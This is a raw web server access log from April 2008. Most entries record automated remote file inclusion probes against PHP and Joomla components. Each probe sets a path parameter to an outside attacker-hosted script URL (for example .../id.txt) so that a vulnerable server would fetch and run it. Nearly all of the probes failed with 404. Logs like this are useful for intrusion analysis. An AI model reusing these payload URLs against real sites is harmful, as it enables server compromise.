78.90.30.31 - - [20/Apr/2008:20:34:10 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:12 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:12 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:13 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
96.52.36.19 - - [20/Apr/2008:20:34:19 -0600] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
78.47.219.34 - - [20/Apr/2008:20:34:41 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
78.47.219.34 - - [20/Apr/2008:20:34:41 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
78.47.219.34 - - [20/Apr/2008:20:34:41 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
212.67.202.9 - - [20/Apr/2008:20:34:55 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:34:55 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.68"
89.111.176.57 - - [20/Apr/2008:20:35:00 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
89.111.176.57 - - [20/Apr/2008:20:35:00 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.111.176.57 - - [20/Apr/2008:20:35:00 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
212.67.202.9 - - [20/Apr/2008:20:36:02 -0600] "GET /logs/access_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.68"
74.6.31.90 - - [20/Apr/2008:20:36:11 -0600] "GET /logs/error_log.20080420 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
78.90.30.31 - - [20/Apr/2008:20:36:16 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:36:17 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:36:19 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:36:21 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:36:21 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:36:22 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
78.47.219.34 - - [20/Apr/2008:20:36:33 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
89.111.176.57 - - [20/Apr/2008:20:36:36 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
207.142.16.5 - - [20/Apr/2008:20:37:09 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 226 "-" "libwww-perl/5.53"
212.67.202.9 - - [20/Apr/2008:20:39:47 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:39:48 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.68"
213.246.51.45 - - [20/Apr/2008:20:40:55 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:48 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:49 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:49 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:50 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:50 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:51 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:52 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:53 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:41:53 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
96.52.36.19 - - [20/Apr/2008:20:42:17 -0600] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
96.52.36.19 - - [20/Apr/2008:20:42:17 -0600] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
80.86.84.169 - - [20/Apr/2008:20:44:45 -0600] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 255 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
80.86.84.169 - - [20/Apr/2008:20:44:45 -0600] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 250 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
200.230.71.1 - - [20/Apr/2008:20:45:12 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:45:13 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:20:45:18 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.68.95.209 - - [20/Apr/2008:20:45:18 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.63"
209.200.245.189 - - [20/Apr/2008:20:47:54 -0600] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.200.245.189 - - [20/Apr/2008:20:47:54 -0600] "GET /convert/mvcw.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.29.70.163 - - [20/Apr/2008:20:47:58 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
200.68.95.209 - - [20/Apr/2008:20:48:35 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:48:36 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"
200.160.251.134 - - [20/Apr/2008:20:48:54 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
200.160.251.134 - - [20/Apr/2008:20:49:04 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.160.251.134 - - [20/Apr/2008:20:49:04 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.68.95.209 - - [20/Apr/2008:20:50:35 -0600] "GET /logs/error_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.63"
64.246.178.34 - - [20/Apr/2008:20:52:23 -0600] "GET /robots.txt HTTP/1.0" 404 204 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
64.246.178.34 - - [20/Apr/2008:20:52:24 -0600] "GET / HTTP/1.1" 200 698 "http://www.whois.sc/evolutionarts.net" "SurveyBot/2.3 (Whois Source)"
200.62.142.210 - - [20/Apr/2008:20:52:46 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:20:52:46 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.76"
200.62.142.210 - - [20/Apr/2008:20:53:03 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.76"
200.160.251.134 - - [20/Apr/2008:20:54:26 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
78.90.30.31 - - [20/Apr/2008:20:55:12 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:55:12 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:55:13 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:55:13 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:55:13 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:55:14 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
72.29.70.163 - - [20/Apr/2008:20:56:39 -0600] "GET /logs/error_log.20080406//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
72.29.70.163 - - [20/Apr/2008:20:56:39 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
89.218.85.18 - - [20/Apr/2008:20:56:55 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
75.126.218.14 - - [20/Apr/2008:20:56:56 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:20:56:56 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
89.218.85.18 - - [20/Apr/2008:20:56:56 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
75.126.218.14 - - [20/Apr/2008:20:56:56 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
72.5.250.201 - - [20/Apr/2008:20:56:58 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:20:56:58 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
72.29.70.163 - - [20/Apr/2008:20:56:58 -0600] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.utviklingsstudier.org//modules/12-cmd.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
72.5.250.201 - - [20/Apr/2008:20:56:58 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
204.15.120.73 - - [20/Apr/2008:20:57:05 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:20:57:05 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:20:57:05 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
72.3.139.246 - - [20/Apr/2008:20:59:31 -0600] "GET //?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
66.7.193.54 - - [20/Apr/2008:21:02:04 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
66.7.193.54 - - [20/Apr/2008:21:02:04 -0600] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
72.232.247.138 - - [20/Apr/2008:21:02:39 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:02:39 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
75.126.174.50 - - [20/Apr/2008:21:02:50 -0600] "GET /logs/error_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
75.126.174.50 - - [20/Apr/2008:21:02:50 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
75.126.174.50 - - [20/Apr/2008:21:02:50 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
75.126.174.50 - - [20/Apr/2008:21:02:51 -0600] "GET /logs/access_log//newspublish/include.php?path%5Bdocroot%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:21:03:35 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:21:03:35 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
204.15.10.228 - - [20/Apr/2008:21:05:01 -0600] "GET /logs/error_log.20080330//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:21:05:01 -0600] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:21:05:01 -0600] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:21:05:22 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=U'R%20AttackeR?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:21:05:22 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=U'R%20AttackeR?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
200.230.71.1 - - [20/Apr/2008:21:06:21 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:06:22 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:06:23 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
72.5.250.201 - - [20/Apr/2008:21:07:03 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:07:03 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:07:03 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:07:08 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
75.126.218.14 - - [20/Apr/2008:21:07:23 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:21:07:23 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:21:07:23 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:21:07:29 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
204.15.120.73 - - [20/Apr/2008:21:07:42 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:21:07:42 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:21:07:42 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:21:07:51 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
204.15.10.228 - - [20/Apr/2008:21:09:36 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:21:09:36 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:21:09:36 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
204.15.10.228 - - [20/Apr/2008:21:09:47 -0600] "GET /logs/access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:21:09:49 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=U'R%20AttackeR?? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
74.55.6.34 - - [20/Apr/2008:21:09:49 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=U'R%20AttackeR?? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
72.232.247.138 - - [20/Apr/2008:21:10:17 -0600] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:10:17 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:10:17 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
